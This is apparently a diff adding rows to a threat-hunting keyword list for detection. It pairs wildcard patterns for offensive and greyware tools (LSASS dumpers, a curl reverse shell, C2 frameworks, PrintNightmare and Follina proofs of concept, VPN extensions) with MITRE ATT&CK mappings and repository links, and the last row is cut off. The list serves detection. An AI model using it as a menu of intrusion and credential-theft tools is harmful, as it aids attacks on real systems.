+"*irkjanm/krbrelayx*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*irs.exe -*","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","78","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" +"*irs.exe exec*","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long 
as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","78","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" +"*irs.exe list*","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","78","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" +"*irs.exe list*","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","78","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" +"*irsl/curlshell*","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","N/A","10","10","272","29","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z" +"*is_kirbi_file*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*is_proxy_stub_dll_loaded*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*isShellcodeThread*","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","770","143","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z" +"*issue_shell_whoami*","offensive_tool_keyword","mythic","A collaborative 
multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*Itay Migdal*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*itm4n/PrintSpoofer*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*itm4n/PrintSpoofer*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*itm4n/PrivescCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*itm4nprivesc*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 
- TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*its-a-feature/Apfell*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*its-a-feature/Mythic*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*its-a-feature/Mythic*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*itsKindred*","offensive_tool_keyword","Github Username","gthub username hosting malware samples and exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/itsKindred","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*ItsNee/Follina-CVE-2022-30190-POC*","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation 
tools","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","1","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z" +"*itunes_backup2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*itwasalladream -u * -p * -d *","offensive_tool_keyword","ItWasAllADream","A PrintNightmare (CVE-2021-34527) Python Scanner. Scan entire subnets for hosts vulnerable to the PrintNightmare RCE","T1046 - T1210.002 - T1047","TA0007 - TA0002","N/A","N/A","Discovery","https://github.com/byt3bl33d3r/ItWasAllADream","1","0","N/A","7","8","738","118","2023-08-25T16:11:40Z","2021-07-05T20:13:49Z" +"*itwasalladream*bogus.dll*","offensive_tool_keyword","ItWasAllADream","A PrintNightmare (CVE-2021-34527) Python Scanner. Scan entire subnets for hosts vulnerable to the PrintNightmare RCE","T1046 - T1210.002 - T1047","TA0007 - TA0002","N/A","N/A","Discovery","https://github.com/byt3bl33d3r/ItWasAllADream","1","0","N/A","7","8","738","118","2023-08-25T16:11:40Z","2021-07-05T20:13:49Z" +"*ItWasAllADream-master*","offensive_tool_keyword","ItWasAllADream","A PrintNightmare (CVE-2021-34527) Python Scanner. Scan entire subnets for hosts vulnerable to the PrintNightmare RCE","T1046 - T1210.002 - T1047","TA0007 - TA0002","N/A","N/A","Discovery","https://github.com/byt3bl33d3r/ItWasAllADream","1","1","N/A","7","8","738","118","2023-08-25T16:11:40Z","2021-07-05T20:13:49Z" +"*IUnknownObj.cpp*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. 
This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" +"*Ivy_1*_darwin_amd64*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" +"*Ivy_1*_linux_amd64*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" +"*Ivy_1*_windows_amd64.exe*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" +"*Ivy-main.zip*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","1","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" +"*iwork2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*JAB4ACAAPQAgAEcAZQB0AC0AUAByAG8AYwBlAHMAcwAgAC0AUABJAEQAIAAkAHAAaQBkACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEUAeABwAGEAbgBkAFAAcgBvAHAAZQByAHQAeQAgAG4AYQBtAGUAOwAgACIAJABwAGkAZAAgACQAeAAuAGUAeABlACIA*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*jackdaw --*","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1595 T1590 T1591","TA0001 - TA0002 - TA0007 - TA0008 - TA0011","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","N/A","N/A","6","532","88","2023-07-19T16:21:49Z","2019-03-27T18:36:41Z" +"*jackdaw.py*","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. 
It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1595 T1590 T1591","TA0001 - TA0002 - TA0007 - TA0008 - TA0011","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","1","N/A","N/A","6","532","88","2023-07-19T16:21:49Z","2019-03-27T18:36:41Z" +"*jackit --reset --debug*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*jaeles scan -s bigip-cve-2020-5902.yaml -U https_url.txt*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*jajilbjjinjmgcibalaakngmkilboobh*","greyware_tool_keyword","Astar VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*jas502n/bypassAV*","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 
- T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/jas502n/bypassAV-1","1","1","N/A","10","10","18","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z" +"*jas502n/CVE-2020-5902*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","4","377","112","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z" +"*jatayu.php*","offensive_tool_keyword","Jatayu","Stealthy Stand Alone PHP Web Shell","T1071","TA0005","N/A","N/A","Shell spawning","https://github.com/SpiderMate/Jatayu","1","1","N/A","N/A","1","31","8","2019-09-12T17:03:13Z","2019-09-12T09:04:10Z" +"*jatayu-image.png*","offensive_tool_keyword","Jatayu","Stealthy Stand Alone PHP Web Shell","T1071","TA0005","N/A","N/A","Shell spawning","https://github.com/SpiderMate/Jatayu","1","1","N/A","N/A","1","31","8","2019-09-12T17:03:13Z","2019-09-12T09:04:10Z" +"*java -jar BeaconTool.jar*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 
T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"*java/jndi/LDAPRefServer.java*","offensive_tool_keyword","POC","JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. you can insert these links into your POC to test vulnerability.","T1190 - T1133 - T1595 - T1132 - T1046 - T1041","TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001","N/A","N/A","Exploitation tools","https://github.com/welk1n/JNDI-Injection-Exploit","1","1","N/A","N/A","10","2331","716","2023-03-22T21:23:32Z","2019-10-10T01:53:49Z" +"*java-deserialization-exploits*","offensive_tool_keyword","java-deserialization-exploits","A collection of curated Java Deserialization Exploits","T1029 - T1529 - T1569 - T1218","TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Coalfire-Research/java-deserialization-exploits","1","0","N/A","N/A","6","583","262","2021-05-16T23:10:49Z","2016-05-31T16:23:08Z" +"*javascript-obfuscator*","offensive_tool_keyword","javascript-obfuscator","JavaScript Obfuscator is a powerful free obfuscator for JavaScript. 
containing a variety of features which provide protection for your source code.","T1027","TA0010","N/A","N/A","Defense Evasion","https://github.com/javascript-obfuscator/javascript-obfuscator","1","0","N/A","N/A","10","11763","1384","2023-09-05T17:32:26Z","2016-05-09T08:16:53Z" +"*jbnmpdkcfkochpanomnkhnafobppmccn*","greyware_tool_keyword","apkfold free vpn","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*jboss_jmx_upload_exploit*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*jdgilggpfmjpbodmhndmhojklgfdlhob*","greyware_tool_keyword","Browser VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*jdk*-activator-rce-test.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability 
Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*jdk*-call-rce-test.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*jdk*-dgc-rce-test.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*jdk*-method-rce-test.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*jdk*-reg-bypass.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" 
+"*jdwp-shellifier.py -t * -p * --cmd *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*jedieiamjmoflcknjdjhpieklepfglin*","greyware_tool_keyword","FastestVPN Proxy","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*jedisct1*","offensive_tool_keyword","Github Username","github username. a knack for cryptography. computer vision. opensource software and infosec. 
hosting infosec tools used by pentester","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/jedisct1","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*jfjallid/go-secdump*","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","1","N/A","10","1","82","7","2023-05-02T15:01:10Z","2023-02-23T17:02:50Z" +"*jgbaghohigdbgbolncodkdlpenhcmcge*","greyware_tool_keyword","Free VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*JGillam/burp-co2*","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","142","40","2019-12-24T22:30:15Z","2015-04-19T03:38:34Z" +"*Jira-Lens.py*","offensive_tool_keyword","Jira-Lens","Fast and customizable vulnerability scanner For JIRA written in Python","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/MayankPandey01/Jira-Lens","1","1","N/A","N/A","3","206","31","2022-08-23T09:57:52Z","2021-11-14T18:37:47Z" +"*jliodmnojccaloajphkingdnpljdhdok*","greyware_tool_keyword","Turbo VPN for PC","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data 
Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*jljopmgdobloagejpohpldgkiellmfnc*","greyware_tool_keyword","PP VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*jmmcatee/cracklord*","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","378","74","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z" +"*JMousqueton/PoC-CVE-2022-30190*","offensive_tool_keyword","POC","POC CVE-2022-30190 CVE 0-day MS Offic RCE aka msdt follina","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/JMousqueton/PoC-CVE-2022-30190","1","1","N/A","N/A","2","149","58","2022-06-05T21:06:13Z","2022-05-30T18:17:38Z" +"*jndi_injection.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
